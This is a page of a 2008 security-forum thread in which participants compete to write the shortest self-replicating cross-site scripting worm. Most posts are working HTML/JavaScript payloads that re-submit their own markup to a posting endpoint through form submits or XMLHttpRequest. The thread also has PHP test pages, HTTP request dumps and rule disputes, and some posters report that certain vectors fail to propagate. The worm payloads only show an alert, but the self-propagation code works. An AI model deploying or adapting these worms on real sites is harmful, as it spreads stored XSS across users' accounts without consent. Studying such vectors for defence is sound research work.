Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: PreviousFirst...1011121314151617181920Next
Current Page: 17 of 20
Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 09, 2008 03:40PM

@ma1 and SDC:

Maybe I am doing sth wrong but it seems both of your latest submissions grow:

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html>
<head>
</head>
<body>
<div>
<form><input name="content"><img src="" onerror="with(i=parentNode)action=(method='post')+'.php',i[0].value='<form>'+innerHTML,submit(alert('XSS'))">XXX
</div>
</body>
</html>



Edited 1 time(s). Last edit at 01/09/2008 03:56PM by .mario.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 09, 2008 03:41PM

yes it grows, u r right, shame on me hehe
to stop it to grow you have to do:
<form><input name="content"><img src="" onerror="with(i=parentNode)action=(method='post')+'.php',i[0].value='<form>'+innerHTML+'</form>',submit(alert('XSS'))"></form>

anyway.. 166 bytes, u r the winner again :D

edit

ah no 160 bytes

<form><input name="content"><img src="" onerror="with(i=parentNode)action=(method='post')+'.php',submit(i[0].value='<form>'+innerHTML.slice(alert('XSS'),154))">

but u are the winner still hehe

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 1 time(s). Last edit at 01/09/2008 03:43PM by sirdarckcat.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Spyware
Date: January 09, 2008 03:45PM

Can someone give me the current TOP THREE, according to RSnake's rules? I have completely lost track after the rule-change, change rollback and whatever.

Oh, my new submission by the way. This should work. [163 chars]

<form><img src="" onerror="i=parentNode,i.action=(i.method='post')+'.php',j=nextSibling,j.value='<form>'+i.innerHTML,i.submit(alert('xss'))"><input name="content">

And also, am I the first to use nextSibling? It's awesome (nextSibling that is).



Edited 1 time(s). Last edit at 01/09/2008 03:51PM by Spyware.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 09, 2008 03:49PM

ahm.. .mario + ma1 + I dunno


.mario:
<form><input name="content"><iframe onload="with(_=parentNode)alert('XSS',submit(_[0].value='<form>'+innerHTML.slice(action=(method='post')+'.php',148)))"

ma1:

<form><input name="content"><iframe onload="with(_=parentNode)alert('XSS',submit(_[0].value='<form>'+innerHTML.slice(action=(method='post')+'.php',149)))">


etc..

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: ma1
Date: January 09, 2008 03:58PM

8) must have a payload of "XSS" in an alert box

OK, these bend rule #8 a bit, but whatever...
<form><input name="content"><iframe onload="XSS:with(_=parentNode)submit(alert(_[0].value='<form>'+innerHTML.slice(action=(method='post')+'.php',146)))"

152!
<form>XSS<input name="content"><iframe onload="with(_=parentNode)submit(alert(_[0].value='<form>'+innerHTML.slice(action=(method='post')+'.php',145)))"

151!

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 09, 2008 04:35PM

lol, I'm not sure if that's valid, but that's a killer idea xD

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: digi7al64
Date: January 09, 2008 04:45PM

for what is is worth - if you read my post on XHR you would see that the latest version of firefox automatically adds the content-type header as does IE7 which thereby conforms to w3c standards

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 09, 2008 05:04PM

Host	sla.ckers.org
User-Agent	Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11
Accept	text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language	en-us,en;q=0.5
Accept-Encoding	gzip,deflate
Accept-Charset	ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive	300
Connection	keep-alive
Referer	http://sla.ckers.org/forum/read.php?2,18790,19352
Cookie	phorum_session_v5=123%3A7753godessbunnieyeahdadadada1234
Pragma	no-cache
Cache-Control	no-cache

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: digi7al64
Date: January 09, 2008 05:17PM

sorry sdc - i meant firefox 2.0.0.11 adds the content type header for XHR (next time i won't assume anything)

POST /post.php HTTP/1.1
Host: xxxxxx.com.au
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-gb,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://xxxxxx.com.au/xss.tester.php
Content-Length: 148
Content-Type: application/xml
Proxy-Authorization: xxxxx
Pragma: no-cache
Cache-Control: no-cache
content=<p><iframe onload="alert('xss');with(new XMLHttpRequest)open('POST','post.php'),send('content=<p>'+parentNode.innerHTML+'<p>')"></iframe><p>



EDIT: To address the + encoding issue

151 byte XHR - only works with the firefox 2.0.0.11 and up and IE. No DocType issues

<p><iframe onload="alert('xss');with(new XMLHttpRequest)open('POST','post.php'),send(''.concat('content=<p>',parentNode.innerHTML,'<p>'))"></iframe><p>

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'



Edited 3 time(s). Last edit at 01/09/2008 05:45PM by digi7al64.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: rsnake
Date: January 09, 2008 05:41PM

@ma1 - hahah, I don't think that payload quiiiiite cuts the mustard. I didn't say ".*XSS.*" ;)

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: rsnake
Date: January 09, 2008 05:50PM

Yup, by my math it does look like .mario is in the lead with 154 bytes, no growth, correct payload and all the lovely infinite self replication a bad guy could ever want.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: rsnake
Date: January 09, 2008 05:54PM

Also, I think I was confusing people regarding the XHR stuff. I have since revised my post for anyone who thought they needed the content type:

http://sla.ckers.org/forum/read.php?2,18790,page=15#msg-19384

Because both FF 2.0.0.11 and the current version of IE7.0 both send it implicitly when it's not there, it's not required for the purpose of this contest.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: digi7al64
Date: January 09, 2008 06:06PM

so by my estimates this puts me in the lead at 151 bytes

self replicating - tick
correct payload - tick
no doctype issues - tick
works in the latest (non beta) browsers - tick
doesn't break with url decoding - tick

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: rsnake
Date: January 09, 2008 06:29PM

@digi7al64 - yours does what it advertises, but for some reason or another, it's not working with the post.php page, I showed:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-trans
itional.dtd">
<html>
<head>
</head>
<body onload="var a=1;" onfocus="var a=1;">


<?php
echo $_POST[content];
?>



</body>
</html>


It's not URL encoding it when it's sending it, perhaps that's the problem? It shows up as blank when it's reflected, as if there is no content. Odd.

- RSnake
Gotta love it. http://ha.ckers.org



Edited 1 time(s). Last edit at 01/09/2008 06:30PM by rsnake.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: digi7al64
Date: January 09, 2008 06:40PM

hahahaha

echo $_POST[content];

should be

echo $_POST['content'];


EDIT:
Being a .NET programmer it seems my knowledge of PHP is limited and your code will work.

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'



Edited 2 time(s). Last edit at 01/09/2008 06:49PM by digi7al64.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: DoctorDan
Date: January 09, 2008 06:56PM

„<iframe onload="with(new XMLHttpRequest)open('POST','post.php'),send(''.concat('content=',parentNode.innerHTML.match(/„.+\v/))),alert('XSS')">0x0B

Is there anything wrong with this 145 character submission? I do believe it is safe to assume there is no „ on the page (especially as I hadn't ever seen that character before). Also, I'm not really relying on knowing the DOM of the page. It must be safe to assume that the iframe has a parentNode (didn't RSnake say we can assume the page has a body?). This is my official submission as of now (since the change with decoding and the + character).

-Dan

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: digi7al64
Date: January 09, 2008 07:08PM

@doctordan - you can assume nothing other then that this code will be included on the page... which for all we know could contain nothing other then the worm. Hence you need to add a parentnode else you have doctype issues which makes it invalid (at least this is what i have gathered from the discussion)

However if there is a body tag then I would have used _.innerHTML which makes my submission 143 bytes long

<p id=_><script>alert('xss');with(new XMLHttpRequest)open('POST','post.php'),send(''.concat('content=<p id=_>',_.innerHTML,'<p>'))</script></p>


--------------------------------

@rsnake - this is the code i am using to test my code and it is logging fine

<?php
	$content = "";
	if (!empty($_POST['content'])) {
		$date=date("F j, Y, g:i a"); 
		$content = urldecode($_POST['content']);
		$post = $date.' - '.htmlspecialchars($content).'<br/>';
	}
	
	$filename = 'log.html';
	
	// Let's make sure the file exists and is writable first.
	if (is_writable($filename) && !empty($post)) {
		if (!$handle = fopen($filename, 'a')) {
			 echo "Cannot open file ($filename)";
			 exit;
		}
		// Write $somecontent to our opened file.
		if (fwrite($handle, $post) === FALSE) {
			echo "Cannot write to file ($filename)";
			exit;
		}
	
		fclose($handle);
	
	} else {
		echo "The file $filename is not writable";
	}

?>
<html>
<head></head>
<body>
<form method="post" action="post.php">
<textarea name="content" style="width: 100%; height: 100px;"><?php echo(htmlspecialchars($content));?></textarea>
<input type="submit" value="submit">
</form>
<?php
	echo ("<hr/>".$content."<hr/>".htmlspecialchars($content).'<hr/>');
?>
</body>
</html>

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'



Edited 4 time(s). Last edit at 01/09/2008 07:17PM by digi7al64.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 09, 2008 07:20PM

the problem is that the auto-added header of firefox:
Content-Type: application/xml

should be:
Content-Type: application/x-www-form-urlencoded


Greetz!!

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: rsnake
Date: January 09, 2008 08:28PM

@DoctorDan - I will be testing both with and without DOCTYPE. I'd tell you if it works or not but I can't cut and paste (long story involving a crappy wireless router, which I shall not explain out of sheer humiliation out of having not bought a better WiFi). Annnnyway, just make sure it works with and without any other content on the page, and yes, it's safe to assume exotic chars are okay.

@digi7al64 - I'll test again tomorrow morning, but I suggest using the code I showed if you want to get a better approximation of what I'm using to test your code.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Gareth Heyes
Date: January 09, 2008 10:55PM

My final submission :)

<b><img src="" onerror="with(new XMLHttpRequest)open('POST','post.php'),send(['content=',parentNode.innerHTML.bold()].join())"></b>

132 chars

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 01/09/2008 11:02PM by Gareth Heyes.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: digi7al64
Date: January 09, 2008 11:24PM

Gareth, you forgot alert('xss'), also you can drop the space between

src="" onerror

as well i believe, also on my test page it submits as

content=,<b><img src="" onerror="with(new XMLHttpRequest)open('POST','post.php'),send(['content=',parentNode.innerHTML.bold()].join())"></b>

adding the extra , at the start of the content value

therefore your final xhr worm would be 144 bytes. Nice stuff!
,<b><img src=""onerror="alert('xss');with(new XMLHttpRequest)open('POST','post.php'),send(['content=',parentNode.innerHTML.bold()].join())"></b>

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'



Edited 3 time(s). Last edit at 01/09/2008 11:37PM by digi7al64.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: thornmaker
Date: January 09, 2008 11:34PM

Gareth's with an alert (143): <b><img src="" onerror="with(new XMLHttpRequest)open('POST','post.php'),send(['content=',parentNode.innerHTML.bold()].join(alert('XSS')))"></b>



Edited 2 time(s). Last edit at 01/09/2008 11:41PM by thornmaker.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Gareth Heyes
Date: January 10, 2008 12:41AM

<img src="" onerror="appendChild(cloneNode(1));c=innerHTML;with(new XMLHttpRequest)open('POST','post.php'),send(['content=',c].join(''));alert('XSS')">

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Gareth Heyes
Date: January 10, 2008 01:02AM

<iframe onload="c=['content=','<iframe onload=\42',attributes[0].nodeValue,'\42>'].join('');with(new XMLHttpRequest)open('POST','post.php'),send(c);alert('XSS')">

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 01/10/2008 01:02AM by Gareth Heyes.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 10, 2008 02:17AM

Wow! did I miss something? or are right back where we started? Don't know about you guys but, I can't seem to to get XHR function without the proper content-type, and I do have the newest version of FireFox.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 10, 2008 02:25AM

Quote

Thursday the 10th of January at 7PM GMT
Is it over? Please say it's over!

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 10, 2008 02:28AM

Yeah free us from our sheer misery!

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Gareth Heyes
Date: January 10, 2008 02:36AM

@Ronald

The contest doesn't require the content-type headers. + are not allowed either because they get converted to spaces unless the payload is correctly escaped.

I'm still fighting Mario's vector, I wish the contest was shorter I'm totally addicted :)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 10, 2008 03:17AM

Well, without the headers the worm doesn't propagate.
so those vectors are useless then, the x-www-form-urlencoded mime escapes
the data properly. So, I can't see how anyone can win with a flawed vector?



Edited 1 time(s). Last edit at 01/10/2008 03:19AM by Ronald.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 10, 2008 03:20AM

Me neither - I couldn't get any of the vectors w/o content-type get running on various boxes with default settings.

Options: ReplyQuote
Pages: PreviousFirst...1011121314151617181920Next
Current Page: 17 of 20


Sorry, only registered users may post in this forum.